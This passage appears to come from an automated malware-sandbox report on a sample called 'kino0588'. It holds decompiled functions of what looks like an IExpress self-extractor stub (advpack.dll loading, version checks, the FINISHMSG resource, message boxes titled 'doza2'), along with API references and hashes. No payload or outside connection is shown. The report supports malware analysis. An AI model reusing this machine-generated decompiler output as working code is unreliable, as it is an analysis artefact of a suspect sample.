                                                                                                                                                                                                                                    0x00193778
                                                                                                                                                                                                                                    0x0019377f
                                                                                                                                                                                                                                    0x00193781
                                                                                                                                                                                                                                    0x0019378e
                                                                                                                                                                                                                                    0x0019378e
                                                                                                                                                                                                                                    0x00193794
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193794
                                                                                                                                                                                                                                    0x00193783
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193785
                                                                                                                                                                                                                                    0x0019378c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019378c
                                                                                                                                                                                                                                    0x00193750
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019372d
                                                                                                                                                                                                                                    0x0019372d
                                                                                                                                                                                                                                    0x0019396b
                                                                                                                                                                                                                                    0x0019396b
                                                                                                                                                                                                                                    0x0019396c
                                                                                                                                                                                                                                    0x0019396e
                                                                                                                                                                                                                                    0x0019396f
                                                                                                                                                                                                                                    0x00193a1e
                                                                                                                                                                                                                                    0x00193a1e
                                                                                                                                                                                                                                    0x00193a22
                                                                                                                                                                                                                                    0x00193a27
                                                                                                                                                                                                                                    0x00193a3e
                                                                                                                                                                                                                                    0x00193a3e

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00193723
                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 001939C3
                                                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 001939F1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$BeepVersion
                                                                                                                                                                                                                                    • String ID: 3$doza2
                                                                                                                                                                                                                                    • API String ID: 2519184315-2054879145
                                                                                                                                                                                                                                    • Opcode ID: da120f8d7f4d2d1bd65a6bfe4ab790a7ced0f50056d28d7315bd143d30bed39f
                                                                                                                                                                                                                                    • Instruction ID: e610d628f01727af93daa01ac59589719554dd424ac9841abdbfcba8d5b9cd47
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da120f8d7f4d2d1bd65a6bfe4ab790a7ced0f50056d28d7315bd143d30bed39f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5091D171E012249FDF398B55CC81BBAB7B1EB46304F1501AAD9AADB251DB708F81CB41
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00196495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                    			E00196495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x198004; // 0x21bd9a3c
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00191781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
				_t26 = "advpack.dll";
				E0019658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00196CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}













                                                                                                                                                                                                                                    0x00196495
                                                                                                                                                                                                                                    0x00196495
                                                                                                                                                                                                                                    0x001964a0
                                                                                                                                                                                                                                    0x001964a7
                                                                                                                                                                                                                                    0x001964ab
                                                                                                                                                                                                                                    0x001964bd
                                                                                                                                                                                                                                    0x001964c2
                                                                                                                                                                                                                                    0x001964d3
                                                                                                                                                                                                                                    0x001964df
                                                                                                                                                                                                                                    0x001964e8
                                                                                                                                                                                                                                    0x00196502
                                                                                                                                                                                                                                    0x001964ee
                                                                                                                                                                                                                                    0x001964f9
                                                                                                                                                                                                                                    0x001964f9
                                                                                                                                                                                                                                    0x00196516

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 001964DF
                                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 001964F9
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00196502
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
                                                                                                                                                                                                                                    • API String ID: 438848745-3856989675
                                                                                                                                                                                                                                    • Opcode ID: dfebab35828415285b7a659aa2b4b5f72ceb405460e54c4e393259c53b742bd3
                                                                                                                                                                                                                                    • Instruction ID: 1b1b190312282f7867755e7f3490e78cc6d0dbc47be8dcd7756cca186eabc65c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfebab35828415285b7a659aa2b4b5f72ceb405460e54c4e393259c53b742bd3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF01A970504108ABEF54EB64DC45EEE7778EF65310F9101A6F589921D0DF70AECACA61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001928E8 Relevance: 7.6, APIs: 5, Instructions: 140memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E001928E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00192773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00192A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00192A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

































                                                                                                                                                                                                                                    0x001928f1
                                                                                                                                                                                                                                    0x001928f4
                                                                                                                                                                                                                                    0x001928f7
                                                                                                                                                                                                                                    0x001928f9
                                                                                                                                                                                                                                    0x001928fc
                                                                                                                                                                                                                                    0x001928ff
                                                                                                                                                                                                                                    0x00192901
                                                                                                                                                                                                                                    0x00192907
                                                                                                                                                                                                                                    0x00192a62
                                                                                                                                                                                                                                    0x00192a64
                                                                                                                                                                                                                                    0x0019290d
                                                                                                                                                                                                                                    0x0019290d
                                                                                                                                                                                                                                    0x0019290f
                                                                                                                                                                                                                                    0x00192912
                                                                                                                                                                                                                                    0x00192920
                                                                                                                                                                                                                                    0x00192937
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192944
                                                                                                                                                                                                                                    0x0019294a
                                                                                                                                                                                                                                    0x0019294f
                                                                                                                                                                                                                                    0x00192a2f
                                                                                                                                                                                                                                    0x00192a32
                                                                                                                                                                                                                                    0x00192a34
                                                                                                                                                                                                                                    0x00192a37
                                                                                                                                                                                                                                    0x00192a41
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192955
                                                                                                                                                                                                                                    0x0019295e
                                                                                                                                                                                                                                    0x00192962
                                                                                                                                                                                                                                    0x00192969
                                                                                                                                                                                                                                    0x0019296f
                                                                                                                                                                                                                                    0x00192974
                                                                                                                                                                                                                                    0x0019298c
                                                                                                                                                                                                                                    0x00192a20
                                                                                                                                                                                                                                    0x00192a21
                                                                                                                                                                                                                                    0x00192a27
                                                                                                                                                                                                                                    0x00192a4c
                                                                                                                                                                                                                                    0x00192a4f
                                                                                                                                                                                                                                    0x00192a50
                                                                                                                                                                                                                                    0x00192a53
                                                                                                                                                                                                                                    0x00192a56
                                                                                                                                                                                                                                    0x00192a5c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001929b2
                                                                                                                                                                                                                                    0x001929b2
                                                                                                                                                                                                                                    0x001929b5
                                                                                                                                                                                                                                    0x001929bd
                                                                                                                                                                                                                                    0x001929c3
                                                                                                                                                                                                                                    0x001929cc
                                                                                                                                                                                                                                    0x001929d5
                                                                                                                                                                                                                                    0x001929d7
                                                                                                                                                                                                                                    0x001929da
                                                                                                                                                                                                                                    0x001929dd
                                                                                                                                                                                                                                    0x001929df
                                                                                                                                                                                                                                    0x001929ec
                                                                                                                                                                                                                                    0x001929f8
                                                                                                                                                                                                                                    0x001929fc
                                                                                                                                                                                                                                    0x001929ff
                                                                                                                                                                                                                                    0x00192a02
                                                                                                                                                                                                                                    0x00192a07
                                                                                                                                                                                                                                    0x00192a0a
                                                                                                                                                                                                                                    0x00192a0f
                                                                                                                                                                                                                                    0x00192a19
                                                                                                                                                                                                                                    0x00192a81
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192a0f
                                                                                                                                                                                                                                    0x0019298c
                                                                                                                                                                                                                                    0x00192974
                                                                                                                                                                                                                                    0x00192962
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019294f
                                                                                                                                                                                                                                    0x00192912
                                                                                                                                                                                                                                    0x00192a65
                                                                                                                                                                                                                                    0x00192a68
                                                                                                                                                                                                                                    0x00192a6c
                                                                                                                                                                                                                                    0x00192a6f
                                                                                                                                                                                                                                    0x00192a6f
                                                                                                                                                                                                                                    0x00192a7d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00192A6F
                                                                                                                                                                                                                                      • Part of subcall function 00192773: CharUpperA.USER32(21BD9A3C,00000000,00000000,00000000), ref: 001927A8
                                                                                                                                                                                                                                      • Part of subcall function 00192773: CharNextA.USER32(0000054D), ref: 001927B5
                                                                                                                                                                                                                                      • Part of subcall function 00192773: CharNextA.USER32(00000000), ref: 001927BC
                                                                                                                                                                                                                                      • Part of subcall function 00192773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00192829
                                                                                                                                                                                                                                      • Part of subcall function 00192773: RegQueryValueExA.ADVAPI32(?,00191140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00192852
                                                                                                                                                                                                                                      • Part of subcall function 00192773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00192870
                                                                                                                                                                                                                                      • Part of subcall function 00192773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001928A0
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00193938,?,?,?,?,-00000005), ref: 00192958
                                                                                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 00192969
                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00193938,?,?,?,?,-00000005,?), ref: 00192A21
                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00192A81
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3949799724-0
                                                                                                                                                                                                                                    • Opcode ID: ba34eecbc7afc9b190afc9c2d04ba146be162621f266c27e23bc252632efe4ee
                                                                                                                                                                                                                                    • Instruction ID: 2e0a72bc6dbf1277f2a85ea1b17a3739f35c55ab4b5de390ddb490477cd803ca
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba34eecbc7afc9b190afc9c2d04ba146be162621f266c27e23bc252632efe4ee
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69510932E00219EFCF25DF98D884AAEBBB5FF48700F14416AE915E3611DB319941DB95
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00194169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                                    			E00194169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0019468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0019468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E001944B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E001944B9(0, 0x4b5, 0, 0, 0x10, 0);
			}





                                                                                                                                                                                                                                    0x0019417d
                                                                                                                                                                                                                                    0x0019418f
                                                                                                                                                                                                                                    0x00194193
                                                                                                                                                                                                                                    0x001941b7
                                                                                                                                                                                                                                    0x001941d3
                                                                                                                                                                                                                                    0x001941e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001941e7
                                                                                                                                                                                                                                    0x001941d5
                                                                                                                                                                                                                                    0x001941d6
                                                                                                                                                                                                                                    0x001941d8
                                                                                                                                                                                                                                    0x001941d9
                                                                                                                                                                                                                                    0x001941da
                                                                                                                                                                                                                                    0x001941df
                                                                                                                                                                                                                                    0x001941e1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001941e1
                                                                                                                                                                                                                                    0x001941b9
                                                                                                                                                                                                                                    0x001941ba
                                                                                                                                                                                                                                    0x001941bc
                                                                                                                                                                                                                                    0x001941bd
                                                                                                                                                                                                                                    0x001941be
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001941be
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001930B4), ref: 00194189
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,001930B4), ref: 001941E7
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                    • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                    • Opcode ID: 00c04cfa6fedd07f7584ec08dc56fa9b5f118888a2758b83917f23dfae42eb57
                                                                                                                                                                                                                                    • Instruction ID: 7b561dfdcfffcd5c47064f09ef00293bd7d6dee048bbb07cf8e23c8018414ca1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00c04cfa6fedd07f7584ec08dc56fa9b5f118888a2758b83917f23dfae42eb57
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9401F4F17002143BFF2826694C86F7B218EDFE5795F554136B705E26809B68EC8241B5
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00197155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00197155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x198004; // 0x21bd9a3c
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x198004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x198004 = _t39;
				}
				_t37 =  !_t36;
				 *0x198008 = _t37;
				return _t37;
			}











                                                                                                                                                                                                                                    0x0019715d
                                                                                                                                                                                                                                    0x00197161
                                                                                                                                                                                                                                    0x00197165
                                                                                                                                                                                                                                    0x00197178
                                                                                                                                                                                                                                    0x00197182
                                                                                                                                                                                                                                    0x0019718e
                                                                                                                                                                                                                                    0x00197197
                                                                                                                                                                                                                                    0x001971a0
                                                                                                                                                                                                                                    0x001971b1
                                                                                                                                                                                                                                    0x001971b8
                                                                                                                                                                                                                                    0x001971c4
                                                                                                                                                                                                                                    0x001971c7
                                                                                                                                                                                                                                    0x001971cb
                                                                                                                                                                                                                                    0x001971d5
                                                                                                                                                                                                                                    0x001971da
                                                                                                                                                                                                                                    0x001971da
                                                                                                                                                                                                                                    0x001971dc
                                                                                                                                                                                                                                    0x001971dc
                                                                                                                                                                                                                                    0x001971e2
                                                                                                                                                                                                                                    0x001971e5
                                                                                                                                                                                                                                    0x001971ee

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00197182
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00197191
                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0019719A
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 001971A3
                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 001971B8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                                                    • Opcode ID: cbcdaa773d80c876ef1f9840025aede471313302bf91353aa3ec6321c44da2f3
                                                                                                                                                                                                                                    • Instruction ID: fe4ba4862c864260d79502892c4425756013fd21de76cfec620b8242911d4263
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbcdaa773d80c876ef1f9840025aede471313302bf91353aa3ec6321c44da2f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18111C71D15208DFCF10DFB8DA48A9EBBF4EF48315FA54866E805E7250EB309A45CB45
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001919E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E001919E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x198004; // 0x21bd9a3c
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E001943D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x199a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
